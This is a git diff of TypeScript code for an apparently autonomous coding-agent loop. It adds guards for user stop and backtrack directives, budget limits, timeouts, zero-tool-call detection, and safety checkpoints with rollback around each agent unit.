       if (loopState.stuckRecoveryAttempts === 0) {
         // Level 1: try verifying the artifact, then cache invalidation + retry
         loopState.stuckRecoveryAttempts++;
-        const artifactExists = deps.verifyExpectedArtifact(
+        const artifactExists = verifyExpectedArtifact(
           unitType,
           unitId,
           s.basePath,
@@ -572,15 +699,17 @@ export async function runDispatch(
           unitId,
           reason: stuckSignal.reason,
         });
+        const stuckDiag = diagnoseExpectedArtifact(unitType, unitId, s.basePath);
+        const stuckRemediation = buildLoopRemediationSteps(unitType, unitId, s.basePath);
+        const stuckParts = [`Stuck on ${unitType} ${unitId} — ${stuckSignal.reason}.`];
+        if (stuckDiag) stuckParts.push(`Expected: ${stuckDiag}`);
+        if (stuckRemediation) stuckParts.push(`To recover:\n${stuckRemediation}`);
+        ctx.ui.notify(stuckParts.join(" "), "error");
         await deps.stopAuto(
           ctx,
           pi,
           `Stuck: ${stuckSignal.reason}`,
         );
-        ctx.ui.notify(
-          `Stuck on ${unitType} ${unitId} — ${stuckSignal.reason}. The expected artifact was not written.`,
-          "error",
-        );
         return { action: "break", reason: "stuck-detected" };
       }
     } else {
@@ -625,9 +754,10 @@ export async function runDispatch(
     prompt = preDispatchResult.prompt;
   }
 
+  const guardBasePath = _resolveDispatchGuardBasePath(s);
   const priorSliceBlocker = deps.getPriorSliceCompletionBlocker(
-    s.basePath,
-    deps.getMainBranch(s.basePath),
+    guardBasePath,
+    deps.getMainBranch(guardBasePath),
     unitType,
     unitId,
   );
@@ -637,18 +767,11 @@ export async function runDispatch(
     return { action: "break", reason: "prior-slice-blocker" };
   }
 
-  const observabilityIssues = await deps.collectObservabilityWarnings(
-    ctx,
-    s.basePath,
-    unitType,
-    unitId,
-  );
-
   return {
     action: "next",
     data: {
       unitType, unitId, prompt, finalPrompt: prompt,
-      pauseAfterUatDispatch, observabilityIssues,
+      pauseAfterUatDispatch,
       state, mid, midTitle,
       isRetry: false, previousTier: undefined,
       hookModelOverride: preDispatchResult.model,
@@ -659,7 +782,7 @@ export async function runDispatch(
 // ─── runGuards ────────────────────────────────────────────────────────────────
 
 /**
- * Phase 2: Guards — budget ceiling, context window, secrets re-check.
+ * Phase 2: Guards — stop directives, budget ceiling, context window, secrets re-check.
  * Returns break to exit the loop, or next to proceed to dispatch.
  */
 export async function runGuards(
@@ -668,12 +791,70 @@ export async function runGuards(
 ): Promise<PhaseResult> {
   const { ctx, pi, s, deps, prefs } = ic;
 
+  // ── Stop/Backtrack directive guard (#3487) ──
+  // Check for unexecuted stop or backtrack captures BEFORE dispatching any unit.
+  // This ensures user "halt" directives are honored immediately.
+  // IMPORTANT: Fail-closed — any exception during stop handling still breaks the loop
+  // to ensure user halt intent is never silently dropped.
+  try {
+    const { loadStopCaptures, markCaptureExecuted } = await import("../captures.js");
+    const stopCaptures = loadStopCaptures(s.basePath);
+    if (stopCaptures.length > 0) {
+      const first = stopCaptures[0];
+      const isBacktrack = first.classification === "backtrack";
+      const label = isBacktrack
+        ? `Backtrack directive: ${first.text}`
+        : `Stop directive: ${first.text}`;
+
+      ctx.ui.notify(label, "warning");
+      deps.sendDesktopNotification(
+        "GSD", label, "warning", "stop-directive",
+        basename(s.originalBasePath || s.basePath),
+      );
+
+      // Pause first — ensures auto-mode stops even if later steps fail
+      await deps.pauseAuto(ctx, pi);
+
+      // For backtrack captures, write the backtrack trigger after pausing
+      if (isBacktrack) {
+        try {
+          const { executeBacktrack } = await import("../triage-resolution.js");
+          executeBacktrack(s.basePath, mid, first);
+        } catch (e) {
+          debugLog("guards", { phase: "backtrack-execution-error", error: String(e) });
+        }
+      }
+
+      // Mark captures as executed only after successful pause/transition
+      for (const cap of stopCaptures) {
+        markCaptureExecuted(s.basePath, cap.id);
+      }
+
+      debugLog("autoLoop", { phase: "exit", reason: isBacktrack ? "user-backtrack" : "user-stop" });
+      return { action: "break", reason: isBacktrack ? "user-backtrack" : "user-stop" };
+    }
+  } catch (e) {
+    // Fail-closed: if anything in the stop guard throws, break the loop
+    // rather than silently continuing and dropping user halt intent
+    debugLog("guards", { phase: "stop-guard-error", error: String(e) });
+    return { action: "break", reason: "stop-guard-error" };
+  }
+
   // Budget ceiling guard
   const budgetCeiling = prefs?.budget_ceiling;
   if (budgetCeiling !== undefined && budgetCeiling > 0) {
     const currentLedger = deps.getLedger() as { units: unknown } | null;
-    const totalCost = currentLedger
-      ? deps.getProjectTotals(currentLedger.units).cost
+    // In parallel worker mode, only count cost from the current auto-mode session
+    // to avoid hitting the ceiling due to historical project-wide spend (#2184).
+    let costUnits = currentLedger?.units;
+    if (process.env.GSD_PARALLEL_WORKER && s.autoStartTime && Array.isArray(costUnits)) {
+      const sessionStartISO = new Date(s.autoStartTime).toISOString();
+      costUnits = costUnits.filter(
+        (u: { startedAt?: string }) => u.startedAt != null && u.startedAt >= sessionStartISO,
+      );
+    }
+    const totalCost = costUnits
+      ? deps.getProjectTotals(costUnits).cost
       : 0;
     const budgetPct = totalCost / budgetCeiling;
     const budgetAlertLevel = deps.getBudgetAlertLevel(budgetPct);
@@ -699,7 +880,7 @@ export async function runGuards(
         // 100% — special enforcement logic (halt/pause/warn)
         const msg = `Budget ceiling ${deps.formatCost(budgetCeiling)} reached (spent ${deps.formatCost(totalCost)}).`;
         if (budgetEnforcementAction === "halt") {
-          deps.sendDesktopNotification("GSD", msg, "error", "budget");
+          deps.sendDesktopNotification("GSD", msg, "error", "budget", basename(s.originalBasePath || s.basePath));
           await deps.stopAuto(ctx, pi, "Budget ceiling reached");
           debugLog("autoLoop", { phase: "exit", reason: "budget-halt" });
           return { action: "break", reason: "budget-halt" };
@@ -709,14 +890,14 @@ export async function runGuards(
             `${msg} Pausing auto-mode — /gsd auto to override and continue.`,
             "warning",
           );
-          deps.sendDesktopNotification("GSD", msg, "warning", "budget");
+          deps.sendDesktopNotification("GSD", msg, "warning", "budget", basename(s.originalBasePath || s.basePath));
           deps.logCmuxEvent(prefs, msg, "warning");
           await deps.pauseAuto(ctx, pi);
           debugLog("autoLoop", { phase: "exit", reason: "budget-pause" });
           return { action: "break", reason: "budget-pause" };
         }
         ctx.ui.notify(`${msg} Continuing (enforcement: warn).`, "warning");
-        deps.sendDesktopNotification("GSD", msg, "warning", "budget");
+        deps.sendDesktopNotification("GSD", msg, "warning", "budget", basename(s.originalBasePath || s.basePath));
         deps.logCmuxEvent(prefs, msg, "warning");
       } else if (threshold.pct < 100) {
         // Sub-100% — simple notification
@@ -727,6 +908,7 @@ export async function runGuards(
           msg,
           threshold.notifyLevel,
           "budget",
+          basename(s.originalBasePath || s.basePath),
         );
         deps.logCmuxEvent(prefs, msg, threshold.cmuxLevel);
       }
@@ -756,6 +938,7 @@ export async function runGuards(
         `Context ${contextUsage.percent}% — paused`,
         "warning",
         "attention",
+        basename(s.originalBasePath || s.basePath),
       );
       await deps.pauseAuto(ctx, pi);
       debugLog("autoLoop", { phase: "exit", reason: "context-window" });
@@ -809,7 +992,7 @@ export async function runUnitPhase(
   sidecarItem?: SidecarItem,
 ): Promise<PhaseResult<{ unitStartedAt: number }>> {
   const { ctx, pi, s, deps, prefs } = ic;
-  const { unitType, unitId, prompt, observabilityIssues, state, mid } = iterData;
+  const { unitType, unitId, prompt, state, mid } = iterData;
 
   debugLog("autoLoop", {
     phase: "unit-execution",
@@ -836,12 +1019,39 @@ export async function runUnitPhase(
     }
     const hasProjectFile = PROJECT_FILES.some((f) => deps.existsSync(join(s.basePath, f)));
     const hasSrcDir = deps.existsSync(join(s.basePath, "src"));
-    if (!hasProjectFile && !hasSrcDir) {
-      const msg = `Worktree health check failed: ${s.basePath} has no recognized project files — refusing to dispatch ${unitType} ${unitId}`;
-      debugLog("runUnitPhase", { phase: "worktree-health-fail", basePath: s.basePath, hasProjectFile, hasSrcDir });
-      ctx.ui.notify(msg, "error");
-      await deps.stopAuto(ctx, pi, msg);
-      return { action: "break", reason: "worktree-invalid" };
+    // Xcode bundles have project-specific names (*.xcodeproj, *.xcworkspace)
+    // that cannot be matched by exact filename — scan the directory by suffix.
+    let hasXcodeBundle = false;
+    try {
+      const entries = deps.existsSync(s.basePath) ? readdirSync(s.basePath) : [];
+      hasXcodeBundle = entries.some((e: string) => e.endsWith(".xcodeproj") || e.endsWith(".xcworkspace"));
+    } catch (err) {
+      debugLog("runUnitPhase", { phase: "xcode-bundle-scan-failed", basePath: s.basePath, error: String(err) });
+    }
+    // Monorepo support (#2347): if no project files in the worktree directory,
+    // walk parent directories up to the filesystem root. In monorepos,
+    // package.json / Cargo.toml etc. live in a parent directory.
+    let hasProjectFileInParent = false;
+    if (!hasProjectFile && !hasSrcDir && !hasXcodeBundle) {
+      let checkDir = dirname(s.basePath);
+      const { root } = parsePath(checkDir);
+      while (checkDir !== root) {
+        // Stop at git repository boundary — ancestors above the repo root
+        // (e.g. ~ or /usr/local) may contain unrelated project files.
+        if (deps.existsSync(join(checkDir, ".git"))) break;
+        if (PROJECT_FILES.some((f) => deps.existsSync(join(checkDir, f)))) {
+          hasProjectFileInParent = true;
+          break;
+        }
+        checkDir = dirname(checkDir);
+      }
+    }
+    if (!hasProjectFile && !hasSrcDir && !hasXcodeBundle && !hasProjectFileInParent) {
+      // Greenfield projects won't have project files yet — the first task creates them.
+      // Log a warning but allow execution to proceed. The .git check above is sufficient
+      // to ensure we're in a valid working directory.
+      debugLog("runUnitPhase", { phase: "worktree-health-warn-greenfield", basePath: s.basePath, hasProjectFile, hasSrcDir, hasXcodeBundle });
+      ctx.ui.notify(`Warning: ${s.basePath} has no recognized project files — proceeding as greenfield project`, "warning");
     }
   }
 
@@ -854,10 +1064,11 @@ export async function runUnitPhase(
   const previousTier = s.currentUnitRouting?.tier;
 
   s.currentUnit = { type: unitType, id: unitId, startedAt: Date.now() };
+  s.lastToolInvocationError = null; // #2883: clear stale error from previous unit
   const unitStartSeq = ic.nextSeq();
   deps.emitJournalEvent({ ts: new Date().toISOString(), flowId: ic.flowId, seq: unitStartSeq, eventType: "unit-start", data: { unitType, unitId } });
   deps.captureAvailableSkills();
-  deps.writeUnitRuntimeRecord(
+  writeUnitRuntimeRecord(
     s.basePath,
     unitType,
     unitId,
@@ -869,16 +1080,29 @@ export async function runUnitPhase(
       lastProgressAt: s.currentUnit.startedAt,
       progressCount: 0,
       lastProgressKind: "dispatch",
+      recoveryAttempts: 0, // Reset so re-dispatched units get full recovery budget (#2322)
     },
   );
 
-  // Status bar + progress widget
+  // Status bar (widget + preconditions deferred until after model selection — see #2899)
   ctx.ui.setStatus("gsd-auto", "auto");
   if (mid)
     deps.updateSliceProgressCache(s.basePath, mid, state.activeSlice?.id);
-  deps.updateProgressWidget(ctx, unitType, unitId, state);
 
-  deps.ensurePreconditions(unitType, unitId, s.basePath, state);
+  // ── Safety harness: reset evidence + create checkpoint ──
+  const safetyConfig = resolveSafetyHarnessConfig(
+    prefs?.safety_harness as Record<string, unknown> | undefined,
+  );
+  if (safetyConfig.enabled && safetyConfig.evidence_collection) {
+    resetEvidence();
+  }
+  // Only checkpoint code-executing units (not lifecycle/planning units)
+  if (safetyConfig.enabled && safetyConfig.checkpoints && unitType === "execute-task") {
+    s.checkpointSha = createCheckpoint(s.basePath, unitId);
+    if (s.checkpointSha) {
+      debugLog("runUnitPhase", { phase: "checkpoint-created", unitId, sha: s.checkpointSha.slice(0, 8) });
+    }
+  }
 
   // Prompt injection
   let finalPrompt = prompt;
@@ -914,12 +1138,6 @@ export async function runUnitPhase(
     }
   }
 
-  const repairBlock =
-    deps.buildObservabilityRepairBlock(observabilityIssues);
-  if (repairBlock) {
-    finalPrompt = `${finalPrompt}${repairBlock}`;
-  }
-
   // Prompt char measurement
   s.lastPromptCharCount = finalPrompt.length;
   s.lastBaselineCharCount = undefined;
@@ -936,8 +1154,8 @@ export async function runUnitPhase(
         (decisionsContent?.length ?? 0) +
         (requirementsContent?.length ?? 0) +
         (projectContent?.length ?? 0);
-    } catch {
-      // Non-fatal
+    } catch (e) {
+      logWarning("engine", "Baseline char count measurement failed", { error: String(e) });
     }
   }
 
@@ -947,9 +1165,7 @@ export async function runUnitPhase(
   } catch (reorderErr) {
     const msg =
       reorderErr instanceof Error ? reorderErr.message : String(reorderErr);
-    process.stderr.write(
-      `[gsd] prompt reorder failed (non-fatal): ${msg}\n`,
-    );
+    logWarning("engine", "Prompt reorder failed", { error: msg });
   }
 
   // Select and apply model (with tier escalation on retry — normal units only)
@@ -966,6 +1182,8 @@ export async function runUnitPhase(
   );
   s.currentUnitRouting =
     modelResult.routing as AutoSession["currentUnitRouting"];
+  s.currentUnitModel =
+    modelResult.appliedModel as AutoSession["currentUnitModel"];
 
   // Apply sidecar/pre-dispatch hook model override (takes priority over standard model selection)
   const hookModelOverride = sidecarItem?.model ?? iterData.hookModelOverride;
@@ -975,6 +1193,7 @@ export async function runUnitPhase(
     if (match) {
       const ok = await pi.setModel(match, { persist: false });
       if (ok) {
+        s.currentUnitModel = match as AutoSession["currentUnitModel"];
         ctx.ui.notify(`Hook model override: ${match.provider}/${match.id}`, "info");
       } else {
         ctx.ui.notify(
@@ -991,6 +1210,17 @@ export async function runUnitPhase(
     }
   }
 
+  // Store the final dispatched model ID so the dashboard can read it (#2899).
+  // This accounts for hook model overrides applied after selectAndApplyModel.
+  s.currentDispatchedModelId = s.currentUnitModel
+    ? `${(s.currentUnitModel as any).provider ?? ""}/${(s.currentUnitModel as any).id ?? ""}`
+    : null;
+
+  // Progress widget + preconditions — deferred to after model selection so the
+  // widget's first render tick shows the correct model (#2899).
+  deps.updateProgressWidget(ctx, unitType, unitId, state);
+  deps.ensurePreconditions(unitType, unitId, s.basePath, state);
+
   // Start unit supervision
   deps.clearUnitTimeout();
   deps.startUnitSupervision({
@@ -1016,7 +1246,6 @@ export async function runUnitPhase(
     deps.lockBase(),
     unitType,
     unitId,
-    s.completedUnits.length,
   );
 
   debugLog("autoLoop", {
@@ -1047,40 +1276,61 @@ export async function runUnitPhase(
     deps.lockBase(),
     unitType,
     unitId,
-    s.completedUnits.length,
     sessionFile,
   );
   deps.writeLock(
     deps.lockBase(),
     unitType,
     unitId,
-    s.completedUnits.length,
     sessionFile,
   );
 
   // Tag the most recent window entry with error info for stuck detection
-  if (unitResult.status === "error" || unitResult.status === "cancelled") {
-    const lastEntry = loopState.recentUnits[loopState.recentUnits.length - 1];
-    if (lastEntry) {
+  const lastEntry = loopState.recentUnits[loopState.recentUnits.length - 1];
+  if (lastEntry) {
+    if (unitResult.errorContext) {
+      lastEntry.error = `${unitResult.errorContext.category}:${unitResult.errorContext.message}`.slice(0, 200);
+    } else if (unitResult.status === "error" || unitResult.status === "cancelled") {
       lastEntry.error = `${unitResult.status}:${unitType}/${unitId}`;
-    }
-  } else if (unitResult.event?.messages?.length) {
-    const lastMsg = unitResult.event.messages[unitResult.event.messages.length - 1];
-    const msgStr = typeof lastMsg === "string" ? lastMsg : JSON.stringify(lastMsg);
-    if (/error|fail|exception/i.test(msgStr)) {
-      const lastEntry = loopState.recentUnits[loopState.recentUnits.length - 1];
-      if (lastEntry) {
+    } else if (unitResult.event?.messages?.length) {
+      const lastMsg = unitResult.event.messages[unitResult.event.messages.length - 1];
+      const msgStr = typeof lastMsg === "string" ? lastMsg : JSON.stringify(lastMsg);
+      if (/error|fail|exception/i.test(msgStr)) {
         lastEntry.error = msgStr.slice(0, 200);
       }
     }
   }
 
   if (unitResult.status === "cancelled") {
+    // Provider-error pause: pauseAuto already handled cleanup and scheduled
+    // recovery. Don't hard-stop — just break out of the loop (#2762).
+    if (unitResult.errorContext?.category === "provider") {
+      debugLog("autoLoop", { phase: "exit", reason: "provider-pause", isTransient: unitResult.errorContext.isTransient });
+      return { action: "break", reason: "provider-pause" };
+    }
+    // Session creation timeout (not a structural error): pause auto-mode
+    // and let the provider-error-resume timer handle recovery (#3767). This
+    // matches the provider-pause path — break out cleanly, don't hard-stop.
+    // Structural errors (TypeError, is not a function) are NOT transient
+    // and must hard-stop to avoid infinite retry loops.
+    if (
+      unitResult.errorContext?.isTransient &&
+      unitResult.errorContext?.category === "timeout"
+    ) {
+      ctx.ui.notify(
+        `Session creation timed out for ${unitType} ${unitId}. Pausing auto-mode (recoverable).`,
+        "warning",
+      );
+      debugLog("autoLoop", { phase: "session-timeout-pause", unitType, unitId });
+      await deps.pauseAuto(ctx, pi);
+      return { action: "break", reason: "session-timeout" };
+    }
+    // All other cancelled states (structural errors, non-transient failures): hard stop
     ctx.ui.notify(
-      `Session creation timed out or was cancelled for ${unitType} ${unitId}. Will retry.`,
+      `Session creation failed for ${unitType} ${unitId}: ${unitResult.errorContext?.message ?? "unknown"}. Stopping auto-mode.`,
       "warning",
     );
-    await deps.stopAuto(ctx, pi, "Session creation failed");
+    await deps.stopAuto(ctx, pi, `Session creation failed: ${unitResult.errorContext?.message ?? "unknown"}`);
     debugLog("autoLoop", { phase: "exit", reason: "session-failed" });
     return { action: "break", reason: "session-failed" };
   }
@@ -1088,39 +1338,45 @@ export async function runUnitPhase(
   // ── Immediate unit closeout (metrics, activity log, memory) ────────
   // Run right after runUnit() returns so telemetry is never lost to a
   // crash between iterations.
-  await deps.closeoutUnit(
-    ctx,
-    s.basePath,
-    unitType,
-    unitId,
-    s.currentUnit.startedAt,
-    deps.buildSnapshotOpts(unitType, unitId),
-  );
+  // Guard: stopAuto() may have nulled s.currentUnit via s.reset() while
+  // this coroutine was suspended at `await runUnit(...)` (#2939).
+  if (s.currentUnit) {
+    await deps.closeoutUnit(
+      ctx,
+      s.basePath,
+      unitType,
+      unitId,
+      s.currentUnit.startedAt,
+      deps.buildSnapshotOpts(unitType, unitId),
+    );
+  }
 
-  // ── Zero tool-call guard (#1833) ──────────────────────────────────
-  // An execute-task agent that completes with 0 tool calls made no
-  // real changes — its summary is hallucinated. Treat as failed so
-  // the task is retried instead of silently marked complete.
-  if (unitType === "execute-task") {
+  // ── Zero tool-call guard (#1833, #2653) ──────────────────────────
+  // Any unit that completes with 0 tool calls made no real progress —
+  // likely context exhaustion where all tool calls errored out. Treat
+  // as failed so the unit is retried in a fresh context instead of
+  // silently passing through to artifact verification (which loops
+  // forever when the unit never produced its artifact).
+  {
     const currentLedger = deps.getLedger() as { units: Array<{ type: string; id: string; startedAt: number; toolCalls: number }> } | null;
     if (currentLedger?.units) {
       const lastUnit = [...currentLedger.units].reverse().find(
-        (u: { type: string; id: string; startedAt: number; toolCalls: number }) => u.type === unitType && u.id === unitId && u.startedAt === s.currentUnit!.startedAt,
+        (u: { type: string; id: string; startedAt: number; toolCalls: number }) => u.type === unitType && u.id === unitId && u.startedAt === s.currentUnit?.startedAt,
       );
       if (lastUnit && lastUnit.toolCalls === 0) {
         debugLog("runUnitPhase", {
           phase: "zero-tool-calls",
           unitType,
           unitId,
-          warning: "Task completed with 0 tool calls — likely hallucinated, marking as failed",
+          warning: "Unit completed with 0 tool calls — likely context exhaustion, marking as failed",
         });
         ctx.ui.notify(
-          `${unitType} ${unitId} completed with 0 tool calls — hallucinated summary, will retry`,
+          `${unitType} ${unitId} completed with 0 tool calls — context exhaustion, will retry`,
           "warning",
         );
-        // Do NOT add to completedUnits — fall through to next iteration
-        // where dispatch will re-derive and re-dispatch this task.
-        return { action: "next", data: { unitStartedAt: s.currentUnit.startedAt } };
+        // Fall through to next iteration where dispatch will re-derive
+        // and re-dispatch this unit.
+        return { action: "next", data: { unitStartedAt: s.currentUnit?.startedAt } };
       }
     }
   }
@@ -1136,32 +1392,55 @@ export async function runUnitPhase(
   const skipArtifactVerification = unitType.startsWith("hook/") || unitType === "custom-step";
   const artifactVerified =
     skipArtifactVerification ||
-    deps.verifyExpectedArtifact(unitType, unitId, s.basePath);
+    verifyExpectedArtifact(unitType, unitId, s.basePath);
   if (artifactVerified) {
-    s.completedUnits.push({
-      type: unitType,
-      id: unitId,
-      startedAt: s.currentUnit.startedAt,
-      finishedAt: Date.now(),
-    });
-    if (s.completedUnits.length > 200) {
-      s.completedUnits = s.completedUnits.slice(-200);
-    }
-    // Flush completed-units to disk so the record survives crashes
-    try {
-      const completedKeysPath = join(gsdRoot(s.basePath), "completed-units.json");
-      const keys = s.completedUnits.map((u) => `${u.type}/${u.id}`);
-      atomicWriteSync(completedKeysPath, JSON.stringify(keys, null, 2));
-    } catch { /* non-fatal: disk flush failure */ }
-
-    deps.clearUnitRuntimeRecord(s.basePath, unitType, unitId);
     s.unitDispatchCount.delete(`${unitType}/${unitId}`);
     s.unitRecoveryCount.delete(`${unitType}/${unitId}`);
   }
 
-  deps.emitJournalEvent({ ts: new Date().toISOString(), flowId: ic.flowId, seq: ic.nextSeq(), eventType: "unit-end", data: { unitType, unitId, status: unitResult.status, artifactVerified }, causedBy: { flowId: ic.flowId, seq: unitStartSeq } });
+  // Write phase handoff anchor after successful research/planning completion
+  const anchorPhases = new Set(["research-milestone", "research-slice", "plan-milestone", "plan-slice"]);
+  if (artifactVerified && mid && anchorPhases.has(unitType)) {
+    try {
+      const { writePhaseAnchor } = await import("../phase-anchor.js");
+      writePhaseAnchor(s.basePath, mid, {
+        phase: unitType,
+        milestoneId: mid,
+        generatedAt: new Date().toISOString(),
+        intent: `Completed ${unitType} for ${unitId}`,
+        decisions: [],
+        blockers: [],
+        nextSteps: [],
+      });
+    } catch (err) { /* non-fatal — anchor is advisory */
+      logWarning("engine", `phase anchor failed: ${err instanceof Error ? err.message : String(err)}`);
+    }
+  }
 
-  return { action: "next", data: { unitStartedAt: s.currentUnit.startedAt } };
+  deps.emitJournalEvent({ ts: new Date().toISOString(), flowId: ic.flowId, seq: ic.nextSeq(), eventType: "unit-end", data: { unitType, unitId, status: unitResult.status, artifactVerified, ...(unitResult.errorContext ? { errorContext: unitResult.errorContext } : {}) }, causedBy: { flowId: ic.flowId, seq: unitStartSeq } });
+
+  // ── Safety harness: checkpoint cleanup or rollback ──
+  if (s.checkpointSha) {
+    if (unitResult.status === "error" && safetyConfig.auto_rollback) {
+      const rolled = rollbackToCheckpoint(s.basePath, unitId, s.checkpointSha);
+      if (rolled) {
+        ctx.ui.notify(`Rolled back to pre-unit checkpoint for ${unitId}`, "info");
+        debugLog("runUnitPhase", { phase: "checkpoint-rollback", unitId });
+      }
+    } else if (unitResult.status === "error") {
+      ctx.ui.notify(
+        `Unit ${unitId} failed. Pre-unit checkpoint available at ${s.checkpointSha.slice(0, 8)}`,
+        "warning",
+      );
+    } else {
+      // Success — clean up checkpoint ref
+      cleanupCheckpoint(s.basePath, unitId);
+      debugLog("runUnitPhase", { phase: "checkpoint-cleaned", unitId });
+    }
+    s.checkpointSha = null;
+  }
+
+  return { action: "next", data: { unitStartedAt: s.currentUnit?.startedAt } };
 }
 
 // ─── runFinalize ──────────────────────────────────────────────────────────────
@@ -1173,6 +1452,7 @@ export async function runUnitPhase(
 export async function runFinalize(
   ic: IterationContext,
   iterData: IterationData,
+  loopState: LoopState,
   sidecarItem?: SidecarItem,
 ): Promise<PhaseResult> {
   const { ctx, pi, s, deps } = ic;
@@ -1196,13 +1476,58 @@ export async function runFinalize(
   };
 
   // Pre-verification processing (commit, doctor, state rebuild, etc.)
+  // Timeout guard: if postUnitPreVerification hangs (e.g., safety harness
+  // deadlock, browser teardown hang, worktree sync stall), force-continue
+  // after timeout so the auto-loop is not permanently frozen (#3757).
+  //
+  // On timeout, null out s.currentUnit so the timed-out task's late async
+  // mutations are harmless — postUnitPreVerification guards all side effects
+  // behind `if (s.currentUnit)`. The next iteration sets a fresh currentUnit.
   // Sidecar items use lightweight pre-verification opts
   const preVerificationOpts: PreVerificationOpts | undefined = sidecarItem
     ? sidecarItem.kind === "hook"
-      ? { skipSettleDelay: true, skipDoctor: true, skipStateRebuild: true, skipWorktreeSync: true }
-      : { skipSettleDelay: true, skipStateRebuild: true }
+      ? { skipSettleDelay: true, skipWorktreeSync: true }
+      : { skipSettleDelay: true }
     : undefined;
-  const preResult = await deps.postUnitPreVerification(postUnitCtx, preVerificationOpts);
+  const preUnitSnapshot = s.currentUnit
+    ? { type: s.currentUnit.type, id: s.currentUnit.id, startedAt: s.currentUnit.startedAt }
+    : null;
+  const preResultGuard = await withTimeout(
+    deps.postUnitPreVerification(postUnitCtx, preVerificationOpts),
+    FINALIZE_PRE_TIMEOUT_MS,
+    "postUnitPreVerification",
+  );
+
+  if (preResultGuard.timedOut) {
+    // Detach session from the timed-out unit so late async completions
+    // cannot mutate state for the next unit (#3757).
+    s.currentUnit = null;
+    loopState.consecutiveFinalizeTimeouts++;
+    debugLog("autoLoop", {
+      phase: "pre-verification-timeout",
+      iteration: ic.iteration,
+      unitType: iterData.unitType,
+      unitId: iterData.unitId,
+      consecutiveTimeouts: loopState.consecutiveFinalizeTimeouts,
+    });
+
+    if (loopState.consecutiveFinalizeTimeouts >= MAX_FINALIZE_TIMEOUTS) {
+      ctx.ui.notify(
+        `postUnitPreVerification timed out ${loopState.consecutiveFinalizeTimeouts} consecutive times — stopping auto-mode to prevent budget waste`,
+        "error",
+      );
+      await deps.stopAuto(ctx, pi, `${loopState.consecutiveFinalizeTimeouts} consecutive finalize timeouts`);
+      return { action: "break", reason: "finalize-timeout-escalation" };
+    }
+
+    ctx.ui.notify(
+      `postUnitPreVerification timed out after ${FINALIZE_PRE_TIMEOUT_MS / 1000}s for ${iterData.unitType} ${iterData.unitId} (${loopState.consecutiveFinalizeTimeouts}/${MAX_FINALIZE_TIMEOUTS}) — continuing to next iteration`,
+      "warning",
+    );
+    return { action: "next", data: undefined as void };
+  }
+
+  const preResult = preResultGuard.value;
   if (preResult === "dispatched") {
     debugLog("autoLoop", {
       phase: "exit",
@@ -1261,7 +1586,45 @@ export async function runFinalize(
   }
 
   // Post-verification processing (DB dual-write, hooks, triage, quick-tasks)
-  const postResult = await deps.postUnitPostVerification(postUnitCtx);
+  // Timeout guard: if postUnitPostVerification hangs (e.g., module import
+  // deadlock, SQLite transaction hang), force-continue after timeout so the
+  // auto-loop is not permanently frozen (#2344).
+  const postResultGuard = await withTimeout(
+    deps.postUnitPostVerification(postUnitCtx),
+    FINALIZE_POST_TIMEOUT_MS,
+    "postUnitPostVerification",
+  );
+
+  if (postResultGuard.timedOut) {
+    // Detach session from the timed-out unit so late async completions
+    // cannot mutate state for the next unit (#3757).
+    s.currentUnit = null;
+    loopState.consecutiveFinalizeTimeouts++;
+    debugLog("autoLoop", {
+      phase: "post-verification-timeout",
+      iteration: ic.iteration,
+      unitType: iterData.unitType,
+      unitId: iterData.unitId,
+      consecutiveTimeouts: loopState.consecutiveFinalizeTimeouts,
+    });
+
+    if (loopState.consecutiveFinalizeTimeouts >= MAX_FINALIZE_TIMEOUTS) {
+      ctx.ui.notify(
+        `postUnitPostVerification timed out ${loopState.consecutiveFinalizeTimeouts} consecutive times — stopping auto-mode to prevent budget waste`,
+        "error",
+      );
+      await deps.stopAuto(ctx, pi, `${loopState.consecutiveFinalizeTimeouts} consecutive finalize timeouts`);
+      return { action: "break", reason: "finalize-timeout-escalation" };
+    }
+
+    ctx.ui.notify(
+      `postUnitPostVerification timed out after ${FINALIZE_POST_TIMEOUT_MS / 1000}s for ${iterData.unitType} ${iterData.unitId} (${loopState.consecutiveFinalizeTimeouts}/${MAX_FINALIZE_TIMEOUTS}) — continuing to next iteration`,
+      "warning",
+    );
+    return { action: "next", data: undefined as void };
+  }
+
+  const postResult = postResultGuard.value;
 
   if (postResult === "stopped") {
     debugLog("autoLoop", {
@@ -1277,5 +1640,8 @@ export async function runFinalize(
     return { action: "break", reason: "step-wizard" };
   }
 
+  // Both pre and post verification completed without timeout — reset counter
+  loopState.consecutiveFinalizeTimeouts = 0;
+
   return { action: "next", data: undefined as void };
 }
diff --git a/src/resources/extensions/gsd/auto/resolve.ts b/src/resources/extensions/gsd/auto/resolve.ts
index 0eb3ef751..6de2eaeee 100644
--- a/src/resources/extensions/gsd/auto/resolve.ts
+++ b/src/resources/extensions/gsd/auto/resolve.ts
@@ -8,7 +8,7 @@
  * Imports from: auto/types
  */
 
-import type { UnitResult, AgentEndEvent } from "./types.js";
+import type { UnitResult, AgentEndEvent, ErrorContext } from "./types.js";
 import type { AutoSession } from "./session.js";
 import { debugLog } from "../debug-logger.js";
 
@@ -77,12 +77,12 @@ export function isSessionSwitchInFlight(): boolean {
  * blocks to ensure the autoLoop is never stuck awaiting a promise that
  * will never resolve. Safe to call when no resolver is pending (no-op).
  */
-export function resolveAgentEndCancelled(): void {
+export function resolveAgentEndCancelled(errorContext?: ErrorContext): void {
   if (_currentResolve) {
     debugLog("resolveAgentEndCancelled", { status: "resolving-cancelled" });
     const r = _currentResolve;
     _currentResolve = null;
-    r({ status: "cancelled" });
+    r({ status: "cancelled", ...(errorContext ? { errorContext } : {}) });
   }
 }
 
diff --git a/src/resources/extensions/gsd/auto/run-unit.ts b/src/resources/extensions/gsd/auto/run-unit.ts
index bf268461d..6f1646364 100644
--- a/src/resources/extensions/gsd/auto/run-unit.ts
+++ b/src/resources/extensions/gsd/auto/run-unit.ts
@@ -11,6 +11,12 @@ import { NEW_SESSION_TIMEOUT_MS } from "./session.js";
 import type { UnitResult } from "./types.js";
 import { _setCurrentResolve, _setSessionSwitchInFlight } from "./resolve.js";
 import { debugLog } from "../debug-logger.js";
+import { logWarning, logError } from "../workflow-logger.js";
+import { resolveAutoSupervisorConfig } from "../preferences.js";
+
+// Tracks the latest session-switch attempt so a late timeout settlement from an
+// older runUnit() call cannot clear the guard for a newer one.
+let sessionSwitchGeneration = 0;
 
 /**
  * Execute a single unit: create a new session, send the prompt, and await
@@ -35,10 +41,13 @@ export async function runUnit(
 
   let sessionResult: { cancelled: boolean };
   let sessionTimeoutHandle: ReturnType<typeof setTimeout> | undefined;
+  const mySessionSwitchGeneration = ++sessionSwitchGeneration;
   _setSessionSwitchInFlight(true);
   try {
